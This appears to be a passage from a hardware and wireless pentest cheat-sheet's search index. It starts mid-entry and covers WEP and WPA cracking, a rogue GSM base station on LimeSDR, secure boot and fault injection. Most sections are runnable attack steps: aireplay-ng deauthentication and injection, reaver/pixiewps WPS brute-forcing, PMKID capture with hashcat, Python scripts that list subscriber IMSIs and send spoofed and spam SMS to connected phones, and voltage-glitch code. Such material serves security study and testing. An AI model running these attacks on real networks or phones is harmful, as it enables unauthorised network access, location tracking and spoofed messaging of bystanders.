client\n\n# fake authentication attack with association timing (every 60s try to reassociate)\naireplay-ng -1 60 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0 # should see a client in airodump\n# -1 6000 to avoid a time 
out.\n</code></pre>"},{"location":"protocols/wifi/wifi-wep/#fragmentation-attack","title":"Fragmentation attack","text":"<p>Goal: 1500 bytes of PRGA. Atheros does not generate the correct packets unless the wireless card is set to the MAC address you are spoofing.</p> <pre><code># attacker mac must be associated (fake auth)\n# Press \"Y\"\naireplay-ng -5 -b $AP_MAC -h $ATTACKER_MAC mon0\n\n# use our PRGA from the fragmentation attack to generate an ARP request\n# SRC_ADDR: 192.168.1.100 \n# DST_ADDR: 192.168.1.255, should not exist (broadcast address)\npacketforge-ng -0 -a $AP_MAC -h $ATTACKER_MAC -l $SRC_ADDR -k $DST_ADDR -y frag.xor -w inject.cap\n# -k: the destination IP i.e. in ARP, this is \"Who has this IP\"\n# -l: the source IP i.e. in ARP, this is \"Tell this IP\"\n\n# check the packet\ntcpdump -n -vvv -e -s0 -r inject.cap\n\n# inject our crafted packet\naireplay-ng -2 -r inject.cap mon0\n\n# crack the WEP key\n# Aircrack-ng will auto-update when new IVs are available\naircrack-ng -0 wepcrack\n\n# if 64-bit WEP is used, cracking time &lt; 5 minutes \n# switch to 128-bit keys after 600000 IVs\n# use the `-f 4` after 2000000\naircrack-ng -n 64 &lt;capture filename&gt;\n</code></pre>"},{"location":"protocols/wifi/wifi-wep/#korek-chopchop-attack","title":"KoreK Chopchop attack","text":"<p>Can't be used against every AP, but might work when fragmentation fails. Much slower than the fragmentation attack.</p> <pre><code># chopchop attack: -4\n# out decrypted: .cap\n# out prga: .xor\n# Press \"Y\" (choose a small packet)\naireplay-ng -4 -b $AP_MAC -h $ATTACKER_MAC mon0\n\n# check the packet and find the network addresses\ntcpdump -n -vvv -e -s0 -r inject.cap\n\n# use our PRGA from the chopchop attack\n# SRC_ADDR: 192.168.1.100 \n# DST_ADDR: 192.168.1.255, should not exist (broadcast address)\npacketforge-ng -0 -a $AP_MAC -h $ATTACKER_MAC -l $SRC_ADDR -k $DST_ADDR -y prga.xor -w chochop_out.cap\n\n# inject our crafted packet\naireplay-ng -2 -r chochop_out.cap mon0\n\n# 
crack the WEP key\naircrack-ng -0 wepcrack\n</code></pre>"},{"location":"protocols/wifi/wifi-wep/#bypassing-wep-shared-key-authentication-ska","title":"Bypassing WEP Shared Key Authentication SKA","text":"<p>By default, most wireless drivers will attempt open authentication first. If open authentication fails, they will proceed to try shared authentication.</p> <p>Prerequisite:</p> <ul> <li>Authentication: Shared Key</li> <li>When Fake Authentication =&gt; <code>AP rejects open-system authentication</code></li> </ul> <pre><code># put into monitor mode on our desired channel\nairmon-ng start wlan0 3 # only a particular channel : 3\nairodump-ng -c 3 --bssid $AP_MAC -w sharedkey mon0\n\n# deauthentication attack on the connected client\n# airodump should display SKA under the AUTH column\n# PRGA file will be saved as xxxx.xor\naireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0\n# TO CHECK aireplay-ng -0 10 -a $AP_MAC -c $VICTIM_MAC mon0\n\n# fake authentication attack with association timing (every 60s try to reassociate)\n# should display switching to Shared Key Authentication\n# If you are using a PRGA file obtained from a chopchop attack, make sure that it is at least 144 bytes long\n# If you have \"Part2: Association Not answering...(Step3)\" -&gt; spoof the MAC address used to fake auth\naireplay-ng -1 60 -e $AP_SSID -y sharedkey.xor -b $AP_MAC -h $ATTACKER_MAC mon0\n\n# ARP replay attack\naireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0\n\n# deauthentication attack on the connected client\n# speed the ARP attack process using deauth\naireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0\n# TO CHECK: aireplay-ng --deauth 1 -a $AP_MAC -h &lt;FakedMac&gt; wlan0mon\n\n# crack the WEP key\naircrack-ng sharedkey.cap\n</code></pre>"},{"location":"protocols/wifi/wifi-wep/#references","title":"References","text":"<ul> <li>TODO</li> </ul>"},{"location":"protocols/wifi/wifi-wpa/","title":"Wifi - WPA 
Cracking","text":""},{"location":"protocols/wifi/wifi-wpa/#tools","title":"Tools","text":"<ul> <li>aircrack-ng/aircrack-ng - WiFi security auditing tools suite</li> <li>bettercap/bettercap</li> </ul>"},{"location":"protocols/wifi/wifi-wpa/#wpa-psk-attack","title":"WPA PSK Attack","text":""},{"location":"protocols/wifi/wifi-wpa/#cracking-wpa-with-john-the-ripper","title":"Cracking WPA with John the Ripper","text":"<pre><code># put into monitor mode on our desired channel\nairmon-ng start wlan0 3 # only a particular channel : 3\nairodump-ng -c 3 --bssid $AP_MAC -w wpajohn mon0 # see no client\n\n# deauthentication to get the WPA handshake (Sniffing should show the 4-way handshake)\naireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0\n\n# crack without john the ripper (-b &lt;BSSID&gt;)\naircrack-ng -0 -w /pentest/passwords/john/password.lst wpajohn-01.cap\naircrack-ng -w password.lst,secondlist.txt wpajohn-01.cap # multiple dicts\n\n# crack with john the ripper - combine mangling rules with aircrack\n# rules example to add in /pentest/passwords/john/john.conf\n# $[0-9]$[0-9]\n# $[0-9]$[0-9]$[0-9]\njohn --wordlist=/pentest/wireless/aircrack-ng/test/password.lst --rules --stdout | aircrack-ng -0 -e $AP_SSID -w - /root/wpajohn\n\n# generate PMKs for faster cracking - Precomputed WPA Keys Database Attack\necho wifu &gt; essid.txt\nairolib-ng test.db --import essid essid.txt\nairolib-ng test.db --stats\nairolib-ng test.db --import passwd /pentest/passwords/john/password.lst\nairolib-ng test.db --batch\nairolib-ng test.db --stats\naircrack-ng -r test.db wpajohn-01.cap\n# airolib-ng test.db --clean all\n\n# Not in lab - Convert to hccap to use with John Jumbo\naircrack-ng &lt;FileName&gt;.cap -J &lt;outFile&gt;\nhccap2john &lt;outFile&gt;.hccap &gt; &lt;JohnOutFile&gt;\njohn &lt;JohnOutFile&gt;\n</code></pre>"},{"location":"protocols/wifi/wifi-wpa/#cracking-wpa-with-cowpatty","title":"Cracking WPA with 
coWPAtty","text":"<p>Better for PMK Rainbow table attacks</p> <pre><code># put into monitor mode on our desired channel\nairmon-ng start wlan0 3 # only a particular channel : 3\nairodump-ng -c 3 --bssid $AP_MAC -w wpacow mon0 # see no client\n\n# deauthentication to get the WPA handshake\naireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0\n\n# coWPAtty dictionary mode (slow)\ncowpatty -r wpacow-01.cap -f /pentest/passwords/john/password.lst -2 -s $AP_SSID\n\n# coWPAtty rainbow table mode (fast)\ngenpmk -f /pentest/passwords/john/password.lst -d wifuhashes -s $AP_SSID\ncowpatty -r wpacow-01.cap -d wifuhashes -2 -s $AP_SSID\n</code></pre>"},{"location":"protocols/wifi/wifi-wpa/#cracking-wpa-with-pyrit","title":"Cracking WPA with Pyrit","text":"<p>Can use GPU</p> <pre><code># put into monitor mode on our desired channel\nairmon-ng start wlan0 3 # only a particular channel : 3\nairodump-ng -c 3 --bssid $AP_MAC -w wpapyrit mon0 # see no client\n\n# deauthentication to get the WPA handshake\naireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0\n\n# clean the cap and extract only good packets\npyrit -r wpapyrit-01.cap analyze\npyrit -r wpapyrit-01.cap -o wpastripped.cap strip\n\n# dictionary attack - slow ++\npyrit -r wpapyrit-01.cap -i /pentest/passwords/john/password.lst -b $AP_MAC attack_passthrough\n\n# pre-computed hashes attack - slow on CPU\npyrit eval # pwds in database\npyrit -i /pentest/passwords/john/password.lst import_passwords # import in the database\npyrit -e $AP_SSID create_essid\npyrit batch # generate\npyrit -r wpastripped.cap attack_db \n\n# gpu power attack - fast on GPU\npyrit list_cores\npyrit -i /pentest/passwords/john/password.lst import_passwords # import in the database\npyrit -e $AP_SSID create_essid\npyrit batch\npyrit -r wpastripped.cap attack_db \n</code></pre>"},{"location":"protocols/wifi/wifi-wpa/#cracking-wpa-with-bettercap","title":"Cracking WPA with bettercap","text":"<ul> <li> <p>Install Bettercap <pre><code># install and update\ngo get 
github.com/bettercap/bettercap\ncd $GOPATH/src/github.com/bettercap/bettercap\nmake build &amp;&amp; sudo make install\nsudo bettercap -eval \"caplets.update; q\"\n</code></pre></p> </li> <li> <p>Scan for Wifi networks <pre><code># run and recon the wifi APs\nsudo bettercap -iface wlan0\n# this will set the interface in monitor mode and start channel hopping on all supported frequencies\n&gt; wifi.recon on \n# we want our APs sorted by number of clients for this attack, the default sorting would be `rssi asc`\n&gt; set wifi.show.sort clients desc\n# every second, clear our view and present an updated list of nearby WiFi networks\n&gt; set ticker.commands 'clear; wifi.show'\n&gt; ticker on\n# lock on the right channel\n&gt; wifi.recon.channel 1\n</code></pre></p> </li> <li> <p>Execute the deauth attack <pre><code># use the bssid of the AP\n&gt; wifi.deauth e0:xx:xx:xx:xx:xx\n/path/to/cap2hccapx /root/bettercap-wifi-handshakes.pcap bettercap-wifi-handshakes.hccapx\n/path/to/hashcat -m 2500 -a3 -w3 bettercap-wifi-handshakes.hccapx '?d?d?d?d?d?d?d?d'\n</code></pre></p> </li> </ul>"},{"location":"protocols/wifi/wifi-wpa/#wpa-wps-attack","title":"WPA WPS Attack","text":"<pre><code>airmon-ng start wlan0\nairodump-ng mon0\n\n# Install\napt-get -y install build-essential libpcap-dev aircrack-ng pixiewps\ngit clone https://github.com/t6x/reaver-wps-fork-t6x\napt-get install reaver\n\n# Reaver integrated dumping tool (can also airodump-ng)\n# Wash gives information about WPS being locked or not\n# A locked WPS has lower chances of success\nwash -i mon0 \n\n# Launch Reaver\nreaver -i mon0 -b $AP_MAC -vv -S\nreaver -i mon0 -c &lt;Channel&gt; -b $AP_MAC -p &lt;PinCode&gt; -vv -S\nreaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv\n\n\n# Now using pixiewps, you can crack the PIN offline\npixiewps -e &lt;pke&gt; -r &lt;pkr&gt; -s &lt;e-hash1&gt; -z &lt;e-hash2&gt; -a &lt;authkey&gt; -n &lt;e-nonce&gt;\n# Then, you can use the PIN with reaver to get the cleartext password\nreaver -i &lt;monitor 
interface&gt; -b &lt;bssid&gt; -c &lt;channel&gt; -p &lt;PIN&gt;\n\n\n# Some manufacturers have implemented protections\n# You can try different switches to bypass\n# -L = Ignore locked state\n# -N = Don't send NACK packets when errors are detected\n# -d = delay X seconds between PIN attempts\n# -T = set timeout period to X second (.5 means half second)\n# -r = After X attempts, sleep for Y seconds\nreaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv -L -N -d 15 -T .5 -r 3:15\n</code></pre> <p>Message \"WARNING: Detected AP rate limiting, waiting 315 seconds before re-trying\" -&gt; AP is protected. Message \"WARNING: Receive timeout occured\" -&gt; AP is too far.</p>"},{"location":"protocols/wifi/wifi-wpa/#wpa-pmkid-attack","title":"WPA PMKID Attack","text":"<pre><code>INTERFACE=$(ifconfig | grep wlp | cut -d\":\" -f1) # mon0\n\n# PMKID capture\n# Note: Based on the noise on the wifi channel it can take some time to receive the PMKID. \n# It can take a while to capture the PMKID (several minutes++)\n# We recommend running hcxdumptool up to 10 minutes before aborting.\n# If an AP receives our association request packet and supports sending \n# sudo hcxdumptool -i wlan0mon -o outfile.pcapng --enable_status=1\nPMKID=$(sudo hcxdumptool -o test.pcapng -i $INTERFACE --enable_status --filtermode=2)\necho $PMKID|grep 'FOUND PMKID' &amp;&gt; /dev/null\nhcxpcaptool -z test.16800 test.pcapng\n\n# Then convert the captured data to a suitable format for hashcat\n# -E retrieve possible passwords from WiFi-traffic (additional, this list will include ESSIDs)\n# -I retrieve identities from WiFi-traffic\n# -U retrieve usernames from WiFi-traffic\n# PMKID*MAC AP*MAC Station*ESSID\n# 2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a\nhcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng\n\n# Cracking the HASH\nhashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'\nhashcat -m 16800 -d 1 -w 3 myHashes rockyou.txt \n\n# Check 
clGetPlatformIDs(): CL_PLATFORM_NOT_FOUND_KHR\n</code></pre> <p>Bettercap WPA - PMKID attack</p> <pre><code>wifi.assoc all\n/path/to/hcxpcaptool -z bettercap-wifi-handshakes.pmkid /root/bettercap-wifi-handshakes.pcap\n/path/to/hashcat -m16800 -a3 -w3 bettercap-wifi-handshakes.pmkid '?d?d?d?d?d?d?d?d'\n</code></pre>"},{"location":"protocols/wifi/wifi-wpa/#references","title":"References","text":"<ul> <li>TODO</li> </ul>"},{"location":"radio-frequency/limesdr-bts/","title":"GSM Network: LimeSDR","text":"<p>DISCLAIMER: This procedure is highly illegal basically anywhere in the world. Be sure to run this in a closed RF environment (also known as a Faraday cage).</p> <ul> <li>Running a GSM Station with osmo network-in-a-box (sms/audio)</li> <li>Running a GSM Station with full osmo (sms/audio/data) [TODO]</li> </ul>"},{"location":"radio-frequency/limesdr-bts/#running-a-gsm-station-with-osmo-network-in-a-box","title":"Running a GSM Station with osmo network-in-a-box","text":"<p>For this example we will use the Osmocom GSM Stack in the NITB (Network in the box) mode. In this mode the phones connected to your BTS will be able to call each other and send SMS messages. There is also the Interconnect mode in which the BSC (Base Station Controller) connects to an ISDN or IPBX (for example Asterisk) to manage the connected phones. You can check the different modes here: https://osmocom.org/projects/openbsc/wiki/OpenBSC#Configurations-Modes</p> <p>For this article I will be using Ubuntu 18.04 LTS as the operating system, since the pre-compiled packages from LimeMicro help a lot. It should run on any Linux distribution provided that it has the required packages and / or you compile the missing ones. 
I might make a tutorial later about how to install from the source code but for now I will stick to the pre-compiled packages.</p>"},{"location":"radio-frequency/limesdr-bts/#installing-the-required-packages","title":"Installing the required packages","text":"<p>The first thing we need to do is to install all required packages. LimeMicro did nice work and gathered everything pre-compiled in their PPAs. So let\u2019s add them first:</p> <pre><code>sudo add-apt-repository -y ppa:myriadrf/drivers\nsudo add-apt-repository -y ppa:myriadrf/gnuradio\n</code></pre> <p>Let\u2019s also add the osmocom binary builds:</p> <pre><code>wget https://download.opensuse.org/repositories/network:/osmocom:/latest/xUbuntu_18.04/Release.key\nsudo apt-key add Release.key\nrm Release.key\necho \"deb https://download.opensuse.org/repositories/network:/osmocom:/latest/xUbuntu_18.04/ ./\" | sudo tee /etc/apt/sources.list.d/osmocom-latest.list\nsudo apt-get update\n</code></pre> <p>Then we can install the required packages:</p> <pre><code>sudo apt install osmocom-nitb osmo-trx-lms osmo-bts-trx limesuite\n</code></pre> <p>These packages are:</p> <ul> <li><code>osmocom-nitb</code> =&gt; Network in a Box package. Contains everything needed for managing the GSM network</li> <li><code>osmo-bts-trx</code> =&gt; The Base Transceiver Station software that manages how the network packets will be sent.</li> <li><code>osmo-trx-lms</code> =&gt; The LimeSDR \u201cfrontend\u201d for the BTS. This is the piece of software that actually communicates with the LimeSDR</li> <li><code>limesuite</code> =&gt; The software and driver for the LimeSDR</li> </ul>"},{"location":"radio-frequency/limesdr-bts/#updating-the-limesdr-firmware","title":"Updating the LimeSDR Firmware","text":"<p>It is a good practice to check if your LimeSDR firmware is up to date. 
To check and update if needed, you only need to run:</p> <pre><code>LimeUtil --update\n</code></pre> <p>It should do everything that is needed to update.</p>"},{"location":"radio-frequency/limesdr-bts/#creating-the-configuration-files","title":"Creating the configuration files","text":"<p>There are a few files that need to be created. Let\u2019s first start with the OpenBSC config file openbsc.cfg:</p> <p><pre><code>!\n! OpenBSC configuration saved from vty\n! !\npassword foo\n!\nline vty\n no login\n!\ne1_input\n e1_line 0 driver ipa\nnetwork\n network country code 901\n mobile network code 70\n short name HUEHUE\n long name HUEBRNetwork\n auth policy accept-all\n location updating reject cause 13\n encryption a5 0\n neci 1\n rrlp mode none\n mm info 1\n handover 0\n handover window rxlev averaging 10\n handover window rxqual averaging 1\n handover window rxlev neighbor averaging 10\n handover power budget interval 6\n handover power budget hysteresis 3\n handover maximum distance 9999\n bts 0\n type sysmobts\n band GSM900\n cell_identity 0\n location_area_code 1\n training_sequence_code 7\n base_station_id_code 63\n ms max power 15\n cell reselection hysteresis 4\n rxlev access min 0\n channel allocator ascending\n rach tx integer 9\n rach max transmission 7\n ip.access unit_id 1801 0\n oml ip.access stream_id 255 line 0\n gprs mode none\n trx 0\n rf_locked 0\n arfcn 100\n nominal power 23\n max_power_red 20\n rsl e1 tei 0\n timeslot 0\n phys_chan_config CCCH+SDCCH4\n timeslot 1\n phys_chan_config SDCCH8\n timeslot 2\n phys_chan_config TCH/F\n timeslot 3\n phys_chan_config TCH/F\n timeslot 4\n phys_chan_config TCH/F\n timeslot 5\n phys_chan_config TCH/F\n timeslot 6\n phys_chan_config TCH/F\n timeslot 7\n phys_chan_config TCH/F\n</code></pre> There are several parameters here, but I will only describe the ones you might want to change:</p> <pre><code>network country code 901\nmobile network code 70\nshort name HUEHUE\nlong name HUEBRNetwork\nauth policy 
accept-all\n</code></pre> <ul> <li><code>network country code</code> =&gt; That is the MCC of the network operator. It says in which country the operator is operating. For example: 724 is Brazil</li> <li><code>mobile network code</code> =&gt; That is the MNC of the network operator. It says which network operator it is. Every mobile network operator has its own MNC (some of them have more than one).</li> <li><code>short name</code> =&gt; The short name of the network operator</li> <li><code>long name</code> =&gt; The long name of the network operator</li> <li><code>auth policy</code> =&gt; How we will accept the phones that are trying to connect.</li> </ul> <p>Be careful with these settings, especially with an accept-all policy. If you set them to the codes of an existing mobile operator, any phone close to your LimeSDR will connect to it. The operator names (at least on an Android device) only appear after connecting to it.</p> <p>That openbsc.cfg file will be used by the osmo-nitb software. The next file is osmo-bts.cfg:</p> <pre><code>!\n! OsmoBTS configuration example\n!!\n!\nlog stderr\n logging color 1\n logging timestamp 0\n logging level rsl notice\n logging level oml notice\n logging level rll notice\n logging level rr notice\n logging level loop debug\n logging level meas debug\n logging level pag error\n logging level l1c error\n logging level l1p error\n logging level dsp error\n logging level abis error\n\n!\nline vty\n no login\n!\nphy 0\n instance 0\n osmotrx rx-gain 40\n osmotrx tx-attenuation 50\n osmotrx ip local 127.0.0.1\n osmotrx ip remote 127.0.0.1\n no osmotrx timing-advance-loop\nbts 0\n oml remote-ip 127.0.0.1\n ipa unit-id 1801 0\n gsmtap-sapi pdtch\n gsmtap-sapi ccch\n band 900\n trx 0\n phy 0 instance 0\n</code></pre> <p>The only important parameter to take care of here is band. Make sure it is the same as in the openbsc.cfg file. 
The next one is osmo-trx.cfg which will be used by osmo-trx-lms:</p> <pre><code>log stderr\n logging filter all 1\n logging color 1\n logging print category 1\n logging timestamp 1\n logging print file basename\n logging level set-all info\n!\nline vty\n no login\n!\ntrx\n bind-ip 127.0.0.1\n remote-ip 127.0.0.1\n base-port 5700\n egprs disable\n tx-sps 4\n rx-sps 4\n rt-prio 18\n chan 0\n tx-path BAND1\n rx-path LNAW\n</code></pre> <p>There is not much to change here. If you\u2019re using a multi-port LimeSDR (like LimeSDR USB or PCIe) you can change the parameters tx-path and rx-path to the desired paths.</p>"},{"location":"radio-frequency/limesdr-bts/#running-the-software-stack","title":"Running the software stack","text":"<p>There are a few programs to run to get the BTS working. You should run all of them from the folder in which you created the configuration files.</p> <p>The first one we should run is osmo-trx-lms. This one should be run as root to enable high priority scheduling (especially needed if you\u2019re running a small SBC like a Raspberry Pi).</p> <pre><code>sudo osmo-trx-lms\n</code></pre> <p>The second one is osmo-nitb, which is the base station controller. This one doesn\u2019t need to be run as root.</p> <pre><code>osmo-nitb\n</code></pre> <p>And the last one is osmo-bts-trx, which handles the transceiver:</p> <pre><code>osmo-bts-trx\n</code></pre> <p>Now your base station should be running.</p>"},{"location":"radio-frequency/limesdr-bts/#testing-the-base-station","title":"Testing the Base Station","text":"<p>The best way to test is to have a custom SIM card like this one:</p> <p>But since we set the BTS to accept-all mode, you can just go to your phone network settings and select the created network. That will work fine if you have an Android phone which allows you to select custom networks:</p> <p>Here is the network I just created with MCC 724 and MNC 70. 
Some SIM cards require the MCC to match the SIM's country (for example, here it only shows up if the network is at 724).</p> <p>After connecting to the network, the name should appear instead of the MCC+MNC code:</p>"},{"location":"radio-frequency/limesdr-bts/#listing-subscribers","title":"Listing Subscribers","text":"<p>There is a simple Python script to list the subscribers. What it does is open the SQLite database, run a simple query and print the result.</p> <pre><code>#!/usr/bin/env python\nimport sqlite3\n\nHLR_DATABASE = \"hlr.sqlite3\"\ndb = sqlite3.connect(HLR_DATABASE)\nc = db.cursor()\nc.execute(\"SELECT * FROM Subscriber\")\n\nprint \"ID\\t\\tcreated\\t\\tIMSI\\t\\t\\tTMSI\\t\\textension\\n\"\nwhile 1:\n subscriber = c.fetchone()\n if not subscriber:\n break\n\n print \"{0:1}\\t{1:2}\\t{2:&lt;15}\\t\\t{3:&lt;10}\\t{4}\".format(\n subscriber[0],\n subscriber[1],\n subscriber[3],\n subscriber[7],\n subscriber[5]\n )\n\ndb.close()\n</code></pre> <p>The IMSI field is unique to that phone / SIM card combination. That\u2019s the number you can use to track a specific user around the world. The extension is the assigned phone number for that specific phone.</p>"},{"location":"radio-frequency/limesdr-bts/#sending-sms","title":"Sending SMS","text":"<p>There are two scripts I found on the internet to send SMS. They basically select the IMSI from the SQLite database the Osmo stack creates and then connect through the telnet interface to issue the desired commands. One of them is sms_broadcast.py:</p> <pre><code>#!/usr/bin/env python\nimport telnetlib\nimport sqlite3\nimport sys\n\nimsi = 999999999999999\nHLR_DATABASE = \"hlr.sqlite3\"\n\ndef check_extension(extension):\n conn.write(b\"show subscriber extension %s\\n\" % extension)\n res = conn.read_until(b\"OpenBSC&gt; \")\n\n if b\"No subscriber found for extension\" in res:\n create_subscriber(extension)\n\ndef create_subscriber(extension):\n print(\"No user with extension %s found. 
Creating new...\" % extension)\n print(\"Extension: %s, IMSI: %d\" % (extension, imsi))\n\n conn.write(b\"show subscriber imsi %d\\n\" % imsi)\n res = conn.read_until(b\"OpenBSC&gt; \")\n\n if b\"No subscriber found for imsi\" in res:\n conn.write(b\"subscriber create imsi %d\\n\" % imsi)\n conn.read_until(b\"OpenBSC&gt; \")\n\n conn.write(b\"enable\\n\")\n conn.read_until(b\"OpenBSC# \")\n conn.write(b\"subscriber imsi %d extension %s\\n\" % (imsi, extension))\n conn.read_until(b\"OpenBSC# \")\n conn.write(b\"disable\\n\")\n conn.read_until(b\"OpenBSC&gt; \")\n\ndef get_users():\n # returns user id list generator\n\n db = sqlite3.connect(HLR_DATABASE)\n c = db.cursor()\n c.execute(\"SELECT * FROM Subscriber\")\n\n for subscriber in c.fetchall():\n yield subscriber[0]\n\ndef send_sms(id, extension, message):\n conn.write(b\"subscriber id %d sms sender extension %s send %s\\n\" % (id, extension, message))\n res = conn.read_until(b\"OpenBSC&gt; \")\n if b\"%\" in res:\n print(res)\n exit(1)\n\nif __name__ == \"__main__\":\n try:\n extension = sys.argv[1]\n message = \" \".join(sys.argv[2:])\n except:\n print(\"usage: ./sms_broadcast.py extension message\")\n print(\"This script sends a message from the specified extension (number) to all devices connected to this base station\")\n exit(1)\n\n conn = telnetlib.Telnet(\"127.0.0.1\", 4242)\n conn.read_until(b\"OpenBSC&gt; \")\n\n check_extension(extension)\n\n for id in get_users():\n send_sms(id, extension, message)\n</code></pre> <p>This one is pretty simple to use:</p> <p><pre><code>python sms_broadcast.py \"source number\" \"message\"\n</code></pre> This will send an SMS to all connected devices as if it came from the source number.</p> <p>Another option is to target a single user:</p> <pre><code>#!/usr/bin/env python\nimport telnetlib\nimport sys\nimport random\nimport time\n\nimsi = 999999999999999\n\ndef check_extension(extension):\n conn.write(b\"show subscriber extension %s\\n\" % extension)\n res = 
conn.read_until(b\"OpenBSC&gt; \")\n\n if b\"No subscriber found for extension\" in res:\n print(\"Phone with extension %s not found ;(\" % extension)\n exit(1)\n\ndef check_spam_subscriber():\n conn.write(b\"show subscriber imsi %d\\n\" % imsi)\n res = conn.read_until(b\"OpenBSC&gt; \")\n\n if b\"No subscriber found for imsi\" in res:\n conn.write(b\"subscriber create imsi %d\\n\" % imsi)\n print(conn.read_until(b\"OpenBSC&gt; \"))\n\ndef send(extension, spam_number, message):\n print(\"Sending sms from %d...\" % spam_number)\n\n conn.write(b\"enable\\n\")\n conn.read_until(b\"OpenBSC# \")\n conn.write(b\"subscriber imsi %d extension %d\\n\" % (imsi, spam_number))\n conn.read_until(b\"OpenBSC# \")\n conn.write(b\"disable\\n\")\n conn.read_until(b\"OpenBSC&gt; \")\n\n conn.write(b\"subscriber extension %s sms sender extension %d send %s\\n\" % (extension, spam_number, message))\n res = conn.read_until(b\"OpenBSC&gt; \")\n\n if b\"%\" in res:\n print(res)\n exit(1)\n\nif __name__ == \"__main__\":\n try:\n extension = sys.argv[1]\n repeats = int(sys.argv[2])\n message = \" \".join(sys.argv[3:])\n except:\n print(\"usage: ./sms_spam.py extension [num of repeats] message\")\n print(\"This script sends a message to specified number\")\n exit(1)\n\n conn = telnetlib.Telnet(\"127.0.0.1\", 4242)\n conn.read_until(b\"OpenBSC&gt; \")\n\n check_extension(extension)\n check_spam_subscriber()\n\n for _ in range(repeats):\n spam_number = random.randint(1000,9999)\n send(extension, spam_number, message)\n time.sleep(2)\n</code></pre> <p>This one generates a random source number and sends the specified message n times.</p> <pre><code>python sms_spam.py \"target number\" \"number of times\" \"message\"\n</code></pre>"},{"location":"radio-frequency/limesdr-bts/#references","title":"References","text":"<ul> <li>Creating your own GSM Network with LimeSDR</li> <li>OpenBSC: Configuration Modes</li> <li>osmobsc vty reference</li> <li>LimeSDR</li> <li>Sysmocom Custom Simcard</li> 
</ul>"},{"location":"radio-frequency/sdr/","title":"SDR","text":""},{"location":"radio-frequency/sdr/#frequency-independent-sdr-based-signal-understanding-and-reverse-engineering","title":"Frequency Independent SDR-based Signal Understanding and Reverse Engineering","text":"<p>https://github.com/ainfosec/FISSURE</p>"},{"location":"secure-boot/","title":"Secure Boot","text":"<ul> <li>Secure Boot is a security feature implemented in modern computer systems, primarily in those using the Unified Extensible Firmware Interface (UEFI) firmware.</li> <li>Its main purpose is to ensure that only trusted and authenticated software is loaded during the boot process, protecting the system against unauthorized or malicious code that could compromise its integrity and security.</li> <li>During boot, UEFI Secure Boot checks the signature of each piece of boot software, including UEFI firmware drivers (also known as option ROMs), Extensible Firmware Interface (EFI) applications, and the operating system drivers and binaries. If the signatures are valid or trusted by the Original Equipment Manufacturer (OEM), the machine boots and the firmware gives control to the operating system.</li> </ul>"},{"location":"secure-boot/#references","title":"References","text":"<ul> <li>Windows UEFI Bootkit in Rust - memN0ps</li> <li>AzureDocs - Secure Boot - MicrosoftDocs</li> <li>Awesome UEFI Security - river-li</li> </ul>"},{"location":"side-channel/fault-injection/","title":"Fault Injection","text":""},{"location":"side-channel/fault-injection/#power-vcc-voltage-glitch","title":"Power / VCC - Voltage Glitch","text":"<p>Power glitch injection is a physical attack technique used to test and exploit vulnerabilities in electronic devices by causing controlled, temporary power disturbances. 
A VCC glitch, also known as a supply voltage glitch, is a specific type of power glitch attack targeting the voltage supply (VCC) of a microcontroller or integrated circuit (IC) in electronic devices.</p> <p>Most of the time the goal is one of the following:</p> <ul> <li>Re-enable debugging features (e.g. Trezor One wallet)</li> <li>Bypass secure boot</li> <li>Gain code execution by glitching memcpy</li> </ul> <p>Tools</p> <ul> <li>Faultier FW</li> <li>PicoGlitcher v1.1</li> <li>HydraBus</li> <li>ChipWhisperer-Pro</li> <li>ChipWhisperer-Husky</li> </ul> <p>Voltage Glitching with Crowbars</p> <pre><code>import faultier\nimport serial\n\n# Open the Faultier and the serial port it exposes to the target\nft = faultier.Faultier()\nser = serial.Serial(ft.get_serial_path(), baudrate=115200)\nser.timeout = 0.3\n\n# Trigger on a rising edge on EXT0 and drive the crowbar output\nft.configure_glitcher(\n trigger_source = faultier.TRIGGER_IN_EXT0,\n trigger_type = faultier.TRIGGER_PULSE_POSITIVE,\n glitch_output = faultier.OUT_CROWBAR\n)\n# Wait 'delay' cycles after the trigger, then short VCC for 'pulse' cycles\nft.glitch(delay = 1000, pulse = 1)\n# Read back the target's response to see whether the glitch had an effect\nprint(ser.read(3))\n</code></pre> <p>Challenges</p> <ul> <li>Fiasco - Riscure Hardware CTF 2016 - solved using HydraBus + Custom Board with MOSFET <pre><code>gpio glitch trigger PB0 pin PC15 length 100 offsets 191200\ngpio glitch trigger PB0 pin PC15 length 100 offsets 191300\n</code></pre></li> <li>Fiesta - Riscure Hardware CTF 2016</li> <li>Hardware Power Glitch Attack (Fault Injection) - rhme2 Fiesta (FI 100) - solved using custom code running on a Xilinx FPGA</li> <li>AVR Glitch: Modifying Code Execution Paths Using Only Voltage</li> <li>Hextree Glitch Tag - The Hextree GlitchTag is a \"totally not AirTag inspired\" board for the nRF52832 microcontroller. It is intended as a target for the Hextree Faultier. It gives access to all pins that you need to learn basic fault-injection, including glitch characterization and so on. 
It also allows you to reproduce LimitedResults' APPROTECT bypass (that was also used to hack the AirTags) without needing to microsolder!</li> </ul>"},{"location":"side-channel/fault-injection/#electromagnetic-fault","title":"Electromagnetic Fault","text":"<p>Electromagnetic Fault Injection is an advanced technique used in hardware security and testing, where electromagnetic pulses are used to induce faults in electronic devices.</p> <p>Tools</p> <ul> <li>Create a custom Electromagnetic fault injection tool: Dirt cheap Electromagnetic Fault Injection</li> </ul> <p>Challenges</p> <ul> <li>Fiesta - Riscure Hardware CTF 2016 - pedro-javierf - solved using a custom EMFI</li> </ul>"},{"location":"side-channel/fault-injection/#clock-glitch","title":"Clock Glitch","text":"<p>This technique involves momentarily disrupting or altering the clock signal of a device to induce errors or malfunctions in its operation.</p> <p>Challenges</p> <ul> <li>Fiesta - Riscure Hardware CTF 2016 - jcldf - solved using a clock glitch</li> 